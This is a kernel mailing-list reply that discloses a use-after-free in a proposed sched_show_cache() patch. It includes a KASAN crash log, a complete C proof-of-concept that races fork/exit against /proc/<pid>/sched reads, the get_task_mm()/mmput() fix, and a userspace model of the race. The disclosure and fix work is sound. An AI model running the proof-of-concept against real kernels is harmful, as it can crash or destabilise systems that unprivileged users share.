Re: [RFC PATCH 8/8] sched/debug: Print task preferred LLC for scheduler debugging

From: XIAO WU

Date: Sun Jun 28 2026 - 15:29:43 EST


Hi Jianyong,

I came across the Sashiko AI review of this series and reproduced the
use-after-free it flagged in sched_show_cache(): KASAN reports a
slab-use-after-free when /proc/<pid>/sched is read while the target
task is concurrently exiting.

The Sashiko review is at:
https://sashiko.dev/#/patchset/20260625030759.25928-1-wujianyong@xxxxxxxx

> +static void sched_show_cache(struct task_struct *p, struct seq_file *m)
> +{
> +#ifdef CONFIG_SCHED_CACHE
> +    struct mm_struct *mm = p->mm;
> +    int sc_cpu, sc_llc, sc_node, pref_llc, pref_node;
> +
> +    if (!mm)
> +        return;
> +
> +    sc_cpu = READ_ONCE(mm->sc_stat.cpu);

This copies p->mm into a local variable and checks it for NULL, but
does so without holding task_lock(p) or taking a reference via
get_task_mm().  If the target task is concurrently exiting, exit_mm()
can clear p->mm and drop the last mm_users reference, so the
mm_struct may be freed between the NULL check and the
READ_ONCE(mm->sc_stat.cpu) access, resulting in a
slab-use-after-free.

The access is made from proc_sched_show_task(), which is reachable
via /proc/<pid>/sched, so userspace can trigger this for any visible
task simply by reading the proc file while the task exits.

=== Reproduction ===

Kernel: 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
Arch:   x86_64 (QEMU Standard PC Q35 + ICH9, 2009)
Config: CONFIG_KASAN=y, CONFIG_SCHED_CACHE=y

Trigger: race fork/exit against /proc/<pid>/sched reads.  16 worker
processes each repeatedly fork a child and read
/proc/<child_pid>/sched while the child exits immediately.

=== Crash Log ===

[  991.032119][T535366] BUG: KASAN: slab-use-after-free in proc_sched_show_task+0x30c7/0x3470
[  991.032971][T535366] Read of size 4 at addr ffff88802fe0d960 by task poc/535366
[  991.033952][T535366] CPU: 1 UID: 0 PID: 535366 Comm: poc Not tainted 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
[  991.033962][T535366] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009)
[  991.033967][T535366] Call Trace:
[  991.033970][T535366]  <TASK>
[  991.033973][T535366]  dump_stack_lvl+0x116/0x1f0
[  991.033989][T535366]  print_report+0xf4/0x600
[  991.034021][T535366]  kasan_report+0xe0/0x110
[  991.034032][T535366]  ? proc_sched_show_task+0x30c7/0x3470
[  991.034043][T535366]  proc_sched_show_task+0x30c7/0x3470
[  991.034054][T535366]  sched_show+0xf4/0x1b0
[  991.034062][T535366]  seq_read_iter+0x513/0x12d0
[  991.034074][T535366]  seq_read+0x3b1/0x590
[  991.034093][T535366]  vfs_read+0x1e9/0xd00
[  991.034153][T535366]  ksys_read+0x12f/0x250
[  991.034220][T535366]  do_syscall_64+0x129/0x880
[  991.034240][T535366]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  991.034250][T535366]  </TASK>

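KASAN attributes the bad read to proc_sched_show_task(), presumably
because the static sched_show_cache() is inlined into it.  A 4-byte
read from a freed mm_struct is consistent with the
READ_ONCE(mm->sc_stat.cpu) access racing against exit_mm().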

=== PoC ===

Build:  gcc -o poc poc.c -static
Run:    ./poc

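/* sched_show_cache UAF PoC: race fork/exit against /proc/<pid>/sched */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>

static void worker(void)
{
    char buf[64], path[64];
    for (int i = 0; i < 50000000; i++) {
        pid_t pid = fork();
        if (pid == 0) { _exit(0); }    /* child exits immediately */
        if (pid > 0) {
            /* Parent: read the child's sched file while it is exiting. */
            snprintf(path, sizeof(path), "/proc/%d/sched", pid);
            int fd = open(path, O_RDONLY);
            /* A short read still runs the whole show routine via seq_read(). */
            if (fd >= 0) { read(fd, buf, sizeof(buf) - 1); close(fd); }
        }
    }
    _exit(0);
}

int main(void)
{
    /* Auto-reap children (inherited by workers), so no zombies pile up. */
    signal(SIGCHLD, SIG_IGN);
    for (int i = 0; i < 16; i++)
        if (fork() == 0) { worker(); }
    /* Block until all workers are gone; wait() then fails with ECHILD. */
    while (wait(NULL) > 0);
    return 0;
}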

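The fix is to take a reference with get_task_mm(p) and drop it with
mmput(mm) around the mm access.  get_task_mm() reads p->mm under
task_lock(p) and takes an mm_users reference, which pins the
mm_struct for the duration of the read.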
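To make the window concrete, below is a small userspace model of the
race and of the get_task_mm()/mmput() fix.  It is a sketch under
stated assumptions, not kernel code: every identifier in it
(model_mm, model_task, model_get_task_mm(), model_mmput(),
model_exit_mm(), model_show_cache()) is a hypothetical stand-in, the
task lock is modelled as a C11 spinlock, and the last put sets a
"freed" flag instead of calling free(), so the use-after-free is
reported rather than being undefined behaviour.  The race callback
forces the exit path to run between the NULL check and the field
read.

```c
/*
 * Userspace model, not kernel code: every name is hypothetical.
 * model_mm ~ struct mm_struct (users ~ mm_users, sc_cpu ~ sc_stat.cpu),
 * model_task ~ struct task_struct (lock ~ task_lock(), mm ~ p->mm).
 * The last put sets 'freed' instead of calling free(), so a
 * use-after-free is detected rather than being undefined behaviour.
 */
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

struct model_mm {
	atomic_int users;	/* models mm_users */
	bool freed;		/* set when the last reference is dropped */
	int sc_cpu;		/* models mm->sc_stat.cpu */
};

struct model_task {
	atomic_bool lock;	/* models task_lock(p) as a spinlock */
	struct model_mm *mm;	/* models p->mm */
};

static void model_task_lock(struct model_task *p)
{
	while (atomic_exchange(&p->lock, true))
		;	/* spin until the holder releases it */
}

static void model_task_unlock(struct model_task *p)
{
	atomic_store(&p->lock, false);
}

static void model_task_init(struct model_task *p, struct model_mm *mm, int cpu)
{
	atomic_init(&mm->users, 1);	/* the task's own reference */
	mm->freed = false;
	mm->sc_cpu = cpu;
	atomic_init(&p->lock, false);
	p->mm = mm;
}

/* ~ mmput(): drop a reference; dropping the last one "frees" the mm. */
static void model_mmput(struct model_mm *mm)
{
	int old = atomic_fetch_sub(&mm->users, 1);

	assert(old > 0 && !mm->freed);	/* catch an unbalanced put */
	if (old == 1)
		mm->freed = true;
}

/* ~ get_task_mm(): read p->mm under the task lock and take a reference. */
static struct model_mm *model_get_task_mm(struct model_task *p)
{
	struct model_mm *mm;

	model_task_lock(p);
	mm = p->mm;
	if (mm)
		atomic_fetch_add(&mm->users, 1);
	model_task_unlock(p);
	return mm;
}

/* ~ exit_mm(): detach the mm under the lock, then drop the task's reference. */
static void model_exit_mm(struct model_task *p)
{
	struct model_mm *mm;

	model_task_lock(p);
	mm = p->mm;
	p->mm = NULL;
	model_task_unlock(p);
	if (mm)
		model_mmput(mm);
}

/*
 * ~ sched_show_cache().  pin == false mirrors the patch (plain load of
 * p->mm, no reference); pin == true is the get_task_mm()/mmput() fix.
 * 'race', if non-NULL, runs between the NULL check and the field read.
 */
static int model_show_cache(struct model_task *p, bool pin,
			    void (*race)(struct model_task *), bool *uaf)
{
	struct model_mm *mm = pin ? model_get_task_mm(p) : p->mm;
	int cpu;

	*uaf = false;
	if (!mm)
		return -1;		/* no mm: models the early return */
	if (race)
		race(p);		/* the exiting task runs inside the window */
	*uaf = mm->freed;		/* the real kernel would trip KASAN here */
	cpu = mm->sc_cpu;
	if (pin)
		model_mmput(mm);
	return cpu;
}
```

With pin == false the model flags the use-after-free, as KASAN does in
the log above; with pin == true the exiting task's put only drops the
count from 2 to 1, and the reader's own put is the one that releases
the mm.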

Thanks,
Xiao